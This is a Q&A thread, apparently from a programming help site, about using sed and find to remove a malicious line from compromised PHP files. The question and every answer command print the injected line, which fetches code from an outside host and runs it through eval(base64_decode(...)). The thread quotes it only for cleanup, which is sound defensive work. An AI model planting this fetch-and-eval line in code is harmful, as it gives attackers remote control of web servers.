# sed can't get string match

Tags: linux, sed

For the life of me I can't seem to get this to work, no matter how many different combinations I try. I'm trying to recursively search a folder for php files containing a particular string and replace it with something else but I must not be escaping it correctly:

```
find . -name "*.php" -print | xargs sed -i "s|<?php $rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));?>|?>|g"
```

Sed can't seem to find anything even though I know the string is in multiple files (unfortunately it looks like our server has been compromised).

Comment: It might be helpful if you provided (a) an example of a file that does not get properly substituted and (b) what it would look like after a successful substitution.

Comment: Apologies - I'll make sure I follow that format in the future. Your answer hit it on the head.

Answer (score 0, accepted):

I will assume that your input file looks like:

```
<?php $rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode($rrr));?>
```

I will assume that the substitution that you want to perform is exactly as written.  Then, to make it work, the only change that is needed is to escape the dollar signs.  Thus, use:

```
find . -name "*.php" -exec sed -i "s|<?php \$rrr = file_get_contents('http://bihati.cd/sync.php'); eval(base64_decode(\$rrr));?>|?>|g" {} \;
```

A safer approach is to use single-quotes wherever possible to avoid shell interpolation:

```
find . -name '*.php' -exec sed -i 's|<?php $rrr = file_get_contents('\''http://bihati.cd/sync.php'\''); eval(base64_decode($rrr));?>|?>|g' {} \;
```

With my assumed input, the above produces the output:

```
?>
```

Note that the use of `xargs` is unnecessary.  Modern versions of `find` have an `-exec` option that does most of what `xargs` used to do.

**MORE:** To see which files `sed` is working on, one can add a print statement to the `find` command:

```
find . -name '*.php' -print -exec sed -i 's|<?php $rrr = file_get_contents('\''http://bihati.cd/sync.php'\''); eval(base64_decode($rrr));?>|?>|g' {} \;
```

As the above runs, the names of the files being fed to `sed` will be displayed on the terminal (stdout).

**MORE:** To see exactly what changes `sed` has made to the files, keep a backup of the originals:

```
find . -name '*.php' -exec sed -i.saved 's|<?php $rrr = file_get_contents('\''http://bihati.cd/sync.php'\''); eval(base64_decode($rrr));?>|?>|g' {} \;
```

In this case, if `sed` processes `something.php`, then the original is saved in `something.php.saved`.  Afterward, the changes, if any, can be inspected via:

```
diff something.php.saved something.php
```

Comment: Wow, perfect reply. Thank you. Is there a way I can see a list of the files sed is changing? I tried removing the "-i" option but that just displayed the file as sed trawled through it. [Docs](http://www.grymoire.com/Unix/Sed.html) weren't the best help.

Comment: @user31625 OK.  I added some information on that.

Comment: Great, thank you! I'm sure this will be helpful for others as well.